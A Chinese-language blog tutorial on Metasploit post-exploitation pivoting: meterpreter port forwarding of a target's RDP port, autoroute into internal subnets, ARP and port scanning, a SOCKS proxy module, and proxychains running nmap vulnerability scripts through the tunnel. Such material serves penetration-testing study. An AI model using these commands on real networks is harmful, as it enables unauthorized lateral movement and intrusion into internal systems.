当前位置:网站首页>MSF横向之MSF端口转发+路由表+SOCKS5+proxychains
MSF横向之MSF端口转发+路由表+SOCKS5+proxychains
2022-07-06 10:01:00 【西湖第一剑】
MSF后渗透的一些操作
端口转发
meterpreter > portfwd add -l 2222 -r 172.16.1.156 -p 3389 #将目标机172.16.1.156的3389端口转发到本地2222端口
meterpreter > portfwd list #查看转发列表
meterpreter > portfwd flush #清空转发列表
rdesktop 127.0.0.1:2222 #kali远程桌面使用2222端口
添加路由,横向渗透(跨网段攻击)
run autoroute -s 172.16.2.0/24 #添加到目标环境网络
run autoroute –p #查看添加的路由
route print #打印路由
run post/windows/gather/arp_scanner RHOSTS=172.16.2.0/24 #扫描整个段存活主机
run auxiliary/scanner/portscan/tcp RHOSTS=172.16.2.11 PORTS=3389 #检查IP是否开放3389
利用arp扫描内网主机
use post/windows/gather/arp_scanner
set rhosts 172.16.2.0/24
set session 1
exploit
Socks代理篇
新版的msf和老版的不一样,代理模块也不一样。
auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvport 7777
srvport => 7777
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
配置proxychains
用代理软件去连接建立好的socks隧道,便可以成功访问内网。
vi /etc/proxychains.conf #添加 socks5 127.0.0.1 7777
proxychains+nmap扫描主机是否存在漏洞
proxychains nmap -sT -Pn -p445 --script=vuln 192.168.52.141
proxychains使用msf框架
proxychains msfconsole
边栏推荐
- 重磅!蚂蚁开源可信隐私计算框架“隐语”,主流技术灵活组装、开发者友好分层设计...
- [translation] principle analysis of X Window Manager (I)
- node の SQLite
- HMS Core 机器学习服务打造同传翻译新“声”态,AI让国际交流更顺畅
- Solution qui ne peut pas être retournée après la mise à jour du navigateur Web flutter
- JMeter interface test response data garbled
- It doesn't make sense without a distributed gateway
- [ASM] introduction and use of bytecode operation classwriter class
- F200——搭载基于模型设计的国产开源飞控系统无人机
- EasyCVR接入设备开启音频后,视频无法正常播放是什么原因?
猜你喜欢
C# NanoFramework 点灯和按键 之 ESP32
Pytest learning ----- detailed explanation of the request for interface automation test
Olivetin can safely run shell commands on Web pages (Part 1)
EasyCVR接入设备开启音频后,视频无法正常播放是什么原因?
ASEMI整流桥DB207的导通时间与参数选择
[ASM] introduction and use of bytecode operation classwriter class
偷窃他人漏洞报告变卖成副业,漏洞赏金平台出“内鬼”
[introduction to MySQL] the first sentence · first time in the "database" Mainland
视频融合云平台EasyCVR增加多级分组,可灵活管理接入设备
【MySQL入门】第一话 · 初入“数据库”大陆
随机推荐
Solution qui ne peut pas être retournée après la mise à jour du navigateur Web flutter
TCP connection is more than communicating with TCP protocol
面试突击63:MySQL 中如何去重?
The art of Engineering
Easy introduction to SQL (1): addition, deletion, modification and simple query
Flet教程之 13 ListView最常用的滚动控件 基础入门(教程含源码)
FlutterWeb瀏覽器刷新後無法回退的解决方案
EasyCVR电子地图中设备播放器loading样式的居中对齐优化
Interview shock 62: what are the precautions for group by?
[translation] principle analysis of X Window Manager (I)
Kivy tutorial: support Chinese in Kivy to build cross platform applications (tutorial includes source code)
Distributed (consistency protocol) leader election (dotnext.net.cluster implements raft election)
Xin'an Second Edition; Chapter 11 learning notes on the principle and application of network physical isolation technology
Hongmeng introduction and development environment construction
Pytorch extract middle layer features?
Wechat applet obtains mobile number
李書福為何要親自掛帥造手機?
node の SQLite
What is the reason why the video cannot be played normally after the easycvr access device turns on the audio?
The easycvr authorization expiration page cannot be logged in. How to solve it?